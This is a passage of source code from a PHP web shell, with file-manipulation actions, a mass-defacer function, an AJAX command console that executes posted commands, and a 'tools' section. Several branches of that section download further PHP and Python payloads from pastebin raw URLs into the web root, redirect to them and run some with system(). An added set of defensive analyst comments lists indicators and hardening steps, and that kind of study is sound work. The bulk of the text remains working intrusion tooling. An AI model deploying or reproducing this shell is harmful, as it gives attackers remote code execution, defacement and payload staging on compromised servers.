777 | if( is_readable($_POST['p1']) ) {
778 | echo '
';
779 | $code = highlight_file($_POST['p1'],true);
780 | echo str_replace(array(''), array(''),$code).'
';
781 | }
782 | break;
783 | case 'chmod':
784 | if( !empty($_POST['p3']) ) {
785 | $perms = 0;
786 | for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
787 | $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
788 | if(!@chmod($_POST['p1'], $perms))
789 | echo 'Can\'t set permissions!
';
790 | else
791 | die('');
792 | }
793 | echo '
';
794 | break;
795 | case 'edit':
796 | if( !is_writable($_POST['p1'])) {
797 | echo 'File isn\'t writeable';
798 | break;
799 | }
800 | if( !empty($_POST['p3']) ) {
801 | @file_put_contents($_POST['p1'],$_POST['p3']);
802 | echo 'Saved!
';
803 | }
804 | echo '
';
812 | break;
813 | case 'hexdump':
814 | $c = @file_get_contents($_POST['p1']);
815 | $n = 0;
816 | $h = array('00000000
','','');
817 | $len = strlen($c);
818 | for ($i=0; $i<$len; ++$i) {
819 | $h[1] .= sprintf('%02X',ord($c[$i])).' ';
820 | switch ( ord($c[$i]) ) {
821 | case 0:$h[2] .= ' '; break;
822 | case 9:$h[2] .= ' '; break;
823 | case 10: $h[2] .= ' '; break;
824 | case 13: $h[2] .= ' '; break;
825 | default: $h[2] .= $c[$i]; break;
826 | }
827 | $n++;
828 | if ($n == 32) {
829 | $n = 0;
830 | if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';}
831 | $h[1] .= '
';
832 | $h[2] .= "\n";
833 | }
834 | }
835 | echo '
'.$h[0].' | '.$h[1].' | '.htmlspecialchars($h[2]).' |
';
836 | break;
837 | case 'rename':
838 | if( !empty($_POST['p3']) ) {
839 | if(!@rename($_POST['p1'], $_POST['p3']))
840 | echo 'Can\'t rename!
';
841 | else
842 | die('');
843 | }
844 | echo '
';
845 | break;
846 | case 'touch':
847 | if( !empty($_POST['p3']) ) {
848 | $time = strtotime($_POST['p3']);
849 | if($time) {
850 | if(@touch($_POST['p1'],$time,$time))
851 | die('');
852 | else {
853 | echo 'Fail!';
854 | }
855 | } else echo 'Bad time format!';
856 | }
857 | echo '
';
858 | break;
859 | case 'mkfile':
860 | break;
861 | }
862 | echo '
';
863 | printFooter();
864 | }
865 | function actionDefacer() {
866 | printHeader();
867 | echo "Recursive Mass Defacer
';
899 | printFooter();
900 | }
901 | function actionConsole() {
902 | if(isset($_POST['ajax'])) {
903 | $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
904 | ob_start();
905 | echo "document.cf.cmd.value='';\n";
906 | $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
907 | if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)){
908 | if(@chdir($match[1])) {
909 | $GLOBALS['cwd'] = @getcwd();
910 | echo "document.mf.c.value='".$GLOBALS['cwd']."';";
911 | }
912 | }
913 | echo "document.cf.output.value+='".$temp."';";
914 | echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
915 | $temp = ob_get_clean();
916 | echo strlen($temp), "\n", $temp;
917 | exit;
918 | }
919 | printHeader();
920 | echo '';
947 | echo 'Console
';
963 | printFooter();
964 | }
// Removes the session entry keyed by md5() of the request's Host header and prints a
// farewell message. NOTE(review): the markup of the message looks stripped by extraction.
965 | function actionLogout() {
966 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
967 | echo 'Get out Now
968 |
969 | You are out now :D
www.facebook.com/PuNkHoLic';
970 | }
971 | ///my editing start here for tools
// Analyst note (defensive reading): fetches $file_url with file_get_contents() and writes
// whatever comes back to $save_to. Neither the fetch result nor the write result is
// checked, and nothing validates the content. Fetching an http(s) URL this way depends on
// allow_url_fopen, so turning that setting off and filtering outbound traffic from web
// workers both break this download path.
972 | function download_remote_file($file_url, $save_to)
973 | {
974 | $content = file_get_contents($file_url);
975 | file_put_contents($save_to, $content);
976 | }
// Analyst note (defensive reading): second-stage loader. Each POST field tested below
// (cp, SymlinkbySmevk, SymlinkbyCheetah, SymlinkbyTorjan, jump, adminer, cg) makes the
// script fetch a remote file into its own directory and redirect the browser to it; the
// SymlinkbyTorjan and adminer branches additionally call system() (python / wget).
// Indicators visible here: outbound HTTP from the web server to pastebin.com raw URLs,
// and newly created cp.php, SymlinkbySmevk.php, SymlinkbyCheetah.php, sym.py, jump.php,
// cg.php or adminer-4.2.5-mysql-en.php next to the shell.
// Hardening: restrict egress from web workers, keep the docroot non-writable for the PHP
// user, and alert on new .php / .py files created by the web-server account.
977 | if (isset($_POST['cp'])) {
978 | download_remote_file('http://pastebin.com/raw/2Ntdj7ju', realpath("./") . '/cp.php');
979 | header("location:cp.php");
980 | }
981 | if (isset($_POST['SymlinkbySmevk'])) {
982 | download_remote_file('http://pastebin.com/raw.php?i=PhSk7Kvq', realpath("./") . '/SymlinkbySmevk.php');
983 | header("location:SymlinkbySmevk.php");
984 | }
985 | if (isset($_POST['SymlinkbyCheetah'])) {
986 | download_remote_file('http://pastebin.com/raw.php?i=EXejgAMv', realpath("./") . '/SymlinkbyCheetah.php');
987 | header("location:SymlinkbyCheetah.php");
988 | }
989 | if (isset($_POST['SymlinkbyTorjan'])) {
// This branch saves a Python script and executes it with system() after sending the redirect.
990 | download_remote_file('http://pastebin.com/raw.php?i=YUg4pXe2', realpath("./") . '/sym.py');
991 | $url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/trjnx/';
992 | header('location: '.$url);
993 | system('python sym.py');
994 | }
995 | if (isset($_POST['jump'])) {
996 | download_remote_file('http://pastebin.com/raw/MxtcT6nX', realpath("./") . '/jump.php');
997 | header("location:jump.php");
998 | }
999 | if (isset($_POST['adminer'])) {
// This branch shells out to wget rather than using download_remote_file().
1000 | system('wget https://www.adminer.org/static/download/4.2.5/adminer-4.2.5-mysql-en.php adminer.php');
1001 | header("location:adminer-4.2.5-mysql-en.php");
1002 | }
1003 | if (isset($_POST['cg'])) {
1004 | download_remote_file('http://pastebin.com/raw/WSgkDHSN', realpath("./") . '/cg.php');
1005 | header("location:cg.php");
1006 | }
1007 | function actionImportScripts() {
1008 | printHeader();
1009 | echo '